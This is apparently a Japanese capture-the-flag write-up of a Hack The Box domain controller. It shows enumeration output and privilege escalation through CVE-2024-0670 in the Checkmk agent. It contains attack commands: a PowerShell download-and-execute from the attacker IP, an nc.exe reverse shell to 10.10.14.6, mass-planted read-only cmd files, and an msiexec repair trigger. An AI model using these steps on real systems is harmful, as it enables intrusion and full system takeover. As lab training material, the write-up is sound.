いいのないなぁ、スクリプトはNTLMハッシュもらうためのCVE-2025-24071発火スクリプトだしな。
Powerlessも回そうか。
PS C:\Windows\Temp> .\Powerless.bat
.\Powerless.bat
------ System Info (Use full output in conjunction with windows-exploit-suggester.py)-------
Host Name: DC01
OS Name: Microsoft Windows Server 2022 Standard
OS Version: 10.0.20348 N/A Build 20348
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00454-20165-01481-AA791
Original Install Date: 4/2/2025, 6:21:44 PM
System Boot Time: 11/15/2025, 1:16:41 PM
System Manufacturer: VMware, Inc.
System Model: VMware20,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version: VMware, Inc. VMW201.00V.24504846.B64.2501180339, 1/18/2025
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 469 MB
Virtual Memory: Max Size: 5,503 MB
Virtual Memory: Available: 1,337 MB
Virtual Memory: In Use: 4,166 MB
Page File Location(s): C:\pagefile.sys
Domain: nanocorp.htb
Logon Server: \\DC01
Hotfix(s): 3 Hotfix(s) Installed.
[01]: KB5008882
[02]: KB5051979
[03]: KB5050117
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.93
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
----- Architecture -------
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_LEVEL=25
PROCESSOR_REVISION=0101
------ Users and groups (check individual user with 'net user USERNAME' ) Check user privileges for SeImpersonate (rotten potato exploit) -------
Current User: web_svc
USER INFORMATION
----------------
User Name SID
================ =============================================
nanocorp\web_svc S-1-5-21-2261381271-1331810270-697239744-1103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NANOCORP\IT_Support Group S-1-5-21-2261381271-1331810270-697239744-3102 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
--- All users, accounts and groups ---
User accounts for \\DC01
-------------------------------------------------------------------------------
Administrator Guest krbtgt
monitoring_svc web_svc
The command completed successfully.
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 7
Length of password history maintained: 24
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: PRIMARY
The command completed successfully.
Aliases for \\DC01
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*Storage Replica Administrators
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.
------- Administrators --------
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.
------- Environment Variables -------
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\web_svc\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=DC01
ComSpec=C:\Windows\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
HOMEDRIVE=C:
HOMEPATH=\Users\web_svc
LOCALAPPDATA=C:\Users\web_svc\AppData\Local
LOGONSERVER=\\DC01
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\web_svc\AppData\Local\Microsoft\WindowsApps
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_LEVEL=25
PROCESSOR_REVISION=0101
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PROMPT=$P$G
PSExecutionPolicyPreference=Bypass
PSModulePath=C:\Users\web_svc\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PUBLIC=C:\Users\Public
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\web_svc\AppData\Local\Temp
TMP=C:\Users\web_svc\AppData\Local\Temp
USERDNSDOMAIN=nanocorp.htb
USERDOMAIN=NANOCORP
USERDOMAIN_ROAMINGPROFILE=NANOCORP
USERNAME=web_svc
USERPROFILE=C:\Windows\Temp
PrivCheckも回してみるか。
PS C:\Windows\Temp> IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.6/PrivescCheck.ps1'); Invoke-PrivescCheck
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.6/PrivescCheck.ps1'); Invoke-PrivescCheck
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0043 - Reconnaissance ?
? NAME ? User - Identity ?
? TYPE ? Base ?
????????????????????????????????????????????????????????????????
? Get information about the current user (name, domain name) ?
? and its access token (SID, integrity level, authentication ?
? ID). ?
????????????????????????????????????????????????????????????????
Name : NANOCORP\web_svc
SID : S-1-5-21-2261381271-1331810270-697239744-1103
IntegrityLevel : Medium Mandatory Level (S-1-16-8192)
SessionId : 0
TokenId : 00000000-0294b96e
AuthenticationId : 00000000-026b04f7
OriginId : 00000000-023c4b35
ModifiedId : 00000000-026b051b
Source : seclogo (00000000-00000000)
[*] Status: Informational - Severity: None - Execution time: 00:00:00.405
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0043 - Reconnaissance ?
? NAME ? User - Groups ?
? TYPE ? Base ?
????????????????????????????????????????????????????????????????
? Get information about the groups the current user belongs to ?
? (name, type, SID). ?
????????????????????????????????????????????????????????????????
Name Type SID
---- ---- ---
NANOCORP\Domain Users Group S-1-5-21-2261381271-1331810270-697239744-513
Everyone WellKnownGroup S-1-1-0
BUILTIN\Users Alias S-1-5-32-545
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554
NT AUTHORITY\INTERACTIVE WellKnownGroup S-1-5-4
CONSOLE LOGON WellKnownGroup S-1-2-1
NT AUTHORITY\Authenticated Users WellKnownGroup S-1-5-11
NT AUTHORITY\This Organization WellKnownGroup S-1-5-15
NT AUTHORITY\LogonSessionId_0_40568054 LogonSession S-1-5-5-0-40568054
NANOCORP\IT_Support Group S-1-5-21-2261381271-1331810270-697239744-3102
NT AUTHORITY\NTLM Authentication WellKnownGroup S-1-5-64-10
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
[*] Status: Informational - Severity: None - Execution time: 00:00:00.104
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation ?
? NAME ? User - Privileges ?
? TYPE ? Base ?
????????????????????????????????????????????????????????????????
? Check whether the current user is granted privileges that ?
? can be leveraged for local privilege escalation. ?
????????????????????????????????????????????????????????????????
Name State Description Exploitable
---- ----- ----------- -----------
SeMachineAccountPrivilege Disabled Add workstations to domain False
SeChangeNotifyPrivilege Enabled Bypass traverse checking False
SeIncreaseWorkingSetPrivilege Disabled Increase a process working set False
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.323
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation ?
? NAME ? User - Privileges (GPO) ?
? TYPE ? Base ?
????????????????????????????????????????????????????????????????
? Check whether the current user is granted privileges, ?
? through a group policy, that can be leveraged for local ?
? privilege escalation. ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.158
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0006 - Credential Access ?
? NAME ? User - Environment Variables ?
? TYPE ? Base ?
????????????????????????????????????????????????????????????????
? Check whether any environment variables contain sensitive ?
? information such as credentials or secrets. Note that this ?
? check follows a keyword-based approach and thus might not be ?
? completely reliable. ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (nothing found) - Severity: None - Execution time: 00:00:00.047
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation ?
? NAME ? Services - Non-Default Services ?
? TYPE ? Base ?
????????????????????????????????????????????????????????????????
? Get information about third-party services. It does so by ?
? parsing the target executable's metadata and checking ?
? whether the publisher is Microsoft. ?
????????????????????????????????????????????????????????????????
Name : CheckmkService
DisplayName : Checkmk Service
ImagePath : "C:\Program Files (x86)\checkmk\service\check_mk_agent.exe"
User : LocalSystem
StartMode : Automatic
Name : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath : C:\Windows\System32\OpenSSH\ssh-agent.exe
User : LocalSystem
StartMode : Disabled
Name : VGAuthService
DisplayName : VMware Alias Manager and Ticket Service
ImagePath : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
User : LocalSystem
StartMode : Automatic
Name : vm3dservice
DisplayName : @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service
ImagePath : C:\Windows\system32\vm3dservice.exe
User : LocalSystem
StartMode : Automatic
Name : VMTools
DisplayName : VMware Tools
ImagePath : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
User : LocalSystem
StartMode : Automatic
[*] Status: Informational - Severity: None - Execution time: 00:00:04.727
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation ?
? NAME ? Services - Known Vulnerable Kernel Drivers ?
? TYPE ? Base ?
????????????????????????????????????????????????????????????????
? Check whether known vulnerable kernel drivers are installed. ?
? It does so by computing the file hash of each driver and ?
? comparing the value against the list provided by ?
? loldrivers.io. ?
????????????????????????????????????????????????????????????????
WARNING: Service: vwifibus | Path not found: C:\Windows\System32\drivers\vwifibus.sys
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:07.549
お、なんかCheckmkServiceみたいなサービスが見える。
winPeasにもそれっぽいプロセスがあったのでそれかな?

このサービスについて調べてみる。
CVE-2024-0670
以下の特権昇格の脆弱性が見つかった。
これを試してみる。
Tempをいじっていかないといけないのだが、web_svcのUSERPROFILEがC:\Windows\Tempなので、色々と権限がありそう。こっちで試す。
まずはmsiファイルを探索する。
適当にAIにPSコマンド提案してもらった。
PS C:\Windows\system32> Get-ChildItem -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products | Where-Object { $_.GetSubKeyNames() -contains 'InstallProperties' } | ForEach-Object { Get-ItemProperty -Path "$($_.PSPath)\InstallProperties" -ErrorAction SilentlyContinue } | Where-Object { $_.DisplayName -match 'mk' -and $_.LocalPackage -like 'C:\Windows\Installer\*' } | Select-Object DisplayName, LocalPackage | Format-Table -AutoSize
Get-ChildItem -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products | Where-Object { $_.GetSubKeyNames() -contains 'InstallProperties' } | ForEach-Object { Get-ItemProperty -Path "$($_.PSPath)\InstallProperties" -ErrorAction SilentlyContinue } | Where-Object { $_.DisplayName -match 'mk' -and $_.LocalPackage -like 'C:\Windows\Installer\*' } | Select-Object DisplayName, LocalPackage | Format-Table -AutoSize
DisplayName LocalPackage
----------- ------------
Check MK Agent 2.1 C:\Windows\Installer\1e6f2.msi
いた。1e6f2.msiだ。次に実行ファイルなのだが、、、
Processを総当たりするため、ファイルが1万個くらい必要になる。ドでかい悪性ファイルを何個も用意はHTBマシンスペック上厳しいのでBATファイルでコマンドテキストファイルを用意する。
cmd /c "C:\Windows\Temp\nc.exe 10.10.14.6 8444 cmd"
こんな感じだ。後はこれをProcess名総当たりのためのcmd_all_[PID].cmdとして保存する。
PS C:\Windows\Temp> iwr -uri http://10.10.14.6/mal.cmd -o mal.cmd
PS C:\Windows\Temp> 1000..15000 | foreach { copy C:\Windows\Temp\mal.cmd C:\Windows\Temp\cmk_all_$($_)_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_all_$($_)_1.cmd -name IsReadOnly -value $true }
死ぬほどファイルが出来るので、他のHTBの攻略中Userがいる場合はファイル上書き合戦となり、非常に厳しい戦いとなるだろうw
後はmsiexecを通すだけ。
msiexec /fa C:\Windows\Installer\1e6f2.msi
まとめ

ファイル上書き合戦疲れた。これは二度とやりたくない。
Userまではよかった気がするw
今回もセキュリティエンジニアの皆さんの助けになればなと思います。


